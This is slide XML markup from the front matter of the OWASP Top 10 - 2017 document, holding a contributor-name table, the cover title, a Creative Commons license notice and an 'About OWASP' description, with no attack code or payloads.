              <a:tr h="274320">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Anantshri</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Ecbftw</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joaomatosf</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raesene</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yohgaki</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915751994"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">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Bchurchill</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Gilzow</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jrmithdobbs</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riramar</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r>
                        <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Chris </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">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Frohoff</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24951646"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">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Bkimminich</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r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike"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H3xstream</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jsteven</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stefanb</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r>
                        <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Gabriel Lawrence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304800">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Boberski</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HoLyVieR</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jvehent</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taprootsec</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fontAlgn="b">
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buNone/>
                      </a:pP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54797462"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">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Borischen</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Ilatypov</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koto</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tghosth</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274230784"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="l" fontAlgn="b">
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike"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Calico90</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Irbishop</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ossie-git</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r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike"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thesp0nge</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274320">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="l" fontAlgn="b">
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="is-IS" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0"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D00gs</a:t>
                      </a:r>
                      <a:endParaRPr lang="is-I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itscooper</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PauloASilva</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r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1" smtClean="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toddgrotenhuis</a:t>
                      </a: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82800" indent="-82800" algn="l" fontAlgn="b">
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endPar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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110784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000AD95-9F88-4DD0-B766-7519976466A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6887444" cy="91440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0" descr="WASP-01.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="4824012"/>
            <a:ext cx="4876800" cy="3249168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3201130"/>
            <a:ext cx="5562600" cy="538609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" spc="0" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Golden Master (golden-master, post RC2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ln w="24500" cmpd="dbl">
                <a:noFill/>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" cap="none" spc="0" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>omments requested per</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" cap="none" spc="0" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>nstructions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>within</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" cap="none" spc="0" dirty="0">
              <a:ln w="24500" cmpd="dbl">
                <a:noFill/>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="OWASP_logo.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="381000"/>
            <a:ext cx="3260464" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="cc.logo.large.png">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="8501004"/>
            <a:ext cx="1081144" cy="257976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1828800"/>
            <a:ext cx="6019800" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10 - 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>The Ten Most Critical Web Application Security Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935032" y="8768565"/>
            <a:ext cx="4876800" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>This work is licensed under a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Creative Commons Attribution-ShareAlike 4.0 International License</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="8758980"/>
            <a:ext cx="4876800" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>https://owasp.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6858000" cy="42672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sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-9382" y="8382000"/>
            <a:ext cx="6858000" cy="762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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212467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380009324"/>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40914">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Copyright and License</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802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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This document is released under the Creative Commons Attribution Share-Alike 4.0 license. For any reuse or distribution, you must make it clear to others the license terms of this work.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="100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908200777"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="992585"/>
          <a:ext cx="3352800" cy="7008415"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="336555">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Table of Contents</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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6671860">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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64901432"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="990600"/>
          <a:ext cx="3429000" cy="7010400"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="336514">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>About</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">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6673886">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications and APIs that can be trusted. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>At OWASP you'll find free and open</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Application security tools and standards</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Complete books on application security testing, secure code development, and secure code review</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Presentations and videos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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Cheat sheets</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> on many common topics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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Standard security controls and libraries</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Local chapters worldwide</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cutting edge research</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Extensive </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>conferences worldwide</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Mailing lists</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Learn more at: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="0" i="0" u="sng" strike="noStrike" noProof="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>All of the OWASP tools, documents, videos, presentations, and chapters are free and open to anyone interested in improving application security. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in these areas.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. OWASP produces many types of materials in a collaborative, transparent and open way.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The OWASP Foundation is the non-profit entity that ensures the project's long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP Board, Chapter Leaders, Project Leaders, and project members.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We support innovative security research with grants and infrastructure.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Come join us!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
